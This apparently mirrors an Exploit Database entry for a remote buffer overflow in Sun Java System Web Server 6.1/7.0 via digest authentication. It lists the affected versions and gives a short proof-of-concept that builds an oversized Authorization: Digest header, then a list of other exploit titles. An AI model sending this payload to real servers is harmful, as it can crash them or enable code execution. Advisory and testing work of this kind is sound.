Sun Java System Web Server 6.1/7.0 – Digest Authentication Remote Buffer Overflow

Exploit Database
15 阅读

作者： Intevydis

日期： 2010-01-21
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/33553/

source: https://www.securityfocus.com/bid/37896/info

Sun Java System Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

The issues affects the following:

Sun Java System Web Server 7.0 without Update Release 8
Sun Java System Web Server 6.1 without Service Pack 12
Sun Java System Web Proxy Server 4.0 without Service pack 13 

buf = "PUT / HTTP/1.0\n"
buf += "Authorization: Digest "
buf += "ABCD,"*1000
buf += "\n\n"

last Exploits
Sun Java System Web Server 6.1/7.0 – Digest Authentication Remote Buffer Overflow的更多信息

ManageEngine ADSelfService Plus 6.1 – User Enumeration：
Anevia Flamingo XL 3.2.9 – Remote Root Jailbreak：
ASUS infosvr – Authentication Bypass Command Execution (Metasploit)：
NTR – ActiveX Control ‘StopModule()’ Remote Code Execution (Metasploit)：
Skype for Linux 2.1 Beta – Multiple Strange Behaviour Vulnerabilities：
Freefloat FTP Server 1.0 – ‘SIZE’ Remote Buffer Overflow：
OpenDcHub 0.8.1 – Remote Code Execution：
GL.iNet AR300M v3.216 Remote Code Execution – CVE-2023-46456 Exploit：